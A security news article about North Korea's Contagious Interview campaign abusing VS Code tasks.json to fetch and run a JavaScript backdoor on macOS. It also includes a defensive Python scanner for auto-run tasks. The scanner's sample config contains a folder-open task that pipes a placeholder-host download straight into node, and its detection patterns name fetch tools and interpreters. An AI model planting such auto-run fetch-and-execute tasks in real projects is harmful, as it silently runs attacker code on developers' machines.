- The Lazarus group’s Contagious Interview campaign exploits Visual Studio Code via malicious Git repositories
- Attackers deliver JavaScript payloads on macOS that enable persistent data collection and C2 communication
- Jamf urges users to enable advanced threat controls and cautions against trusting unknown repositories
As part of the infamous Contagious Interview campaign, North Korean threat actors were seen misusing legitimate Microsoft Visual Studio Code in their attacks.
Contagious Interview is a hacking campaign in which the Lazarus group (and other state-sponsored North Korean actors) create fake jobs and invite software and blockchain developers in Western countries for interviews.
During the interview process, they trick the victims into deploying malware on their devices, giving the attackers unmitigated access to their computers as well as their current employers’ networks.
The campaign has also been quite successful, as it is blamed for some of the biggest crypto thefts in recent years.
In a new report, security researchers from Jamf describe “an evolution in the techniques used in earlier phases of the campaign.” They said the attackers would first create a malicious Git repository and host it on platforms like GitHub or GitLab.
Then, during the “interview” process, they would trick the victim into cloning and opening the repository using Microsoft Visual Studio Code. The tool asks the victim whether to trust the repository author, and if they do, the app automatically processes the tasks.json configuration file, which triggers the embedded arbitrary commands.
On macOS, these commands use a background shell to externally fetch a JavaScript payload (often from a platform like Vercel) and pass it to the Node.js runtime.
The JavaScript payload is then executed and establishes a persistent loop that harvests host information (hostname, MAC addresses, and OS details) and communicates with a remote command-and-control server (C2). Finally, the backdoor periodically pings the C2 server, sending system data and receiving additional malicious JavaScript instructions.
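The behaviour described above hinges on a task in the repository's .vscode/tasks.json that VS Code runs as soon as the folder is trusted. As an added illustration (not code from the article or from Jamf), the scanner below reads a tasks.json before you click “trust”, picks out tasks configured with VS Code's `runOptions.runOn: folderOpen` auto-run setting, and flags those whose command fetches remote content or hands it to an interpreter. The sample tasks.json is constructed for the example and the URL in it is a placeholder.

```python
import json
import re
from pathlib import Path

# Constructed sample modelled on the reported technique: a benign build task
# plus a task that auto-runs on folder open, fetches JavaScript and pipes it to node.
SAMPLE_TASKS_JSON = r'''{
  // comment lines are legal in VS Code JSONC
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build" },
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -s https://example.invalid/payload.js | node &",
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}'''

FETCH_TOOLS = re.compile(r"\b(curl|wget|fetch|Invoke-WebRequest|iwr)\b", re.I)
INTERPRETERS = re.compile(r"\b(node|bash|sh|zsh|osascript)\b")

def strip_jsonc(text):
    """Remove // and /* */ comments so json.loads can parse VS Code's JSONC."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    return re.sub(r"^\s*//.*$", "", text, flags=re.M)

def command_text(task):
    """Flatten a task's command and args into one string for inspection."""
    parts = [task.get("command", "")] + list(task.get("args", []))
    return " ".join(str(p) for p in parts)

def find_auto_run_tasks(tasks_json_text):
    """Return findings for tasks that VS Code would run automatically on folder open."""
    data = json.loads(strip_jsonc(tasks_json_text))
    findings = []
    for task in data.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        cmd = command_text(task)
        reasons = ["auto-runs on folderOpen"]
        if FETCH_TOOLS.search(cmd):
            reasons.append("fetches remote content")
        if INTERPRETERS.search(cmd):
            reasons.append("hands content to an interpreter")
        findings.append({"label": task.get("label"), "command": cmd, "reasons": reasons})
    return findings

def scan_repo(repo_dir):
    """Scan a cloned repository directory; returns [] when it has no tasks.json."""
    path = Path(repo_dir) / ".vscode" / "tasks.json"
    return find_auto_run_tasks(path.read_text()) if path.is_file() else []
```

Run `scan_repo` against a freshly cloned repository before opening it in VS Code; any finding with all three reasons matches the pattern the report describes and deserves a manual look.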
“We strongly recommend that customers ensure that Threat Prevention and Advanced Threat Control are enabled and set to blocking mode in Jamf for Mac to remain protected against the techniques described in this investigation,” Jamf warned.
“Developers should remain cautious when interacting with third-party repositories, especially those shared directly or originating from unknown sources. Before marking a repository as trusted in Visual Studio Code, it’s important to review its contents,” they added.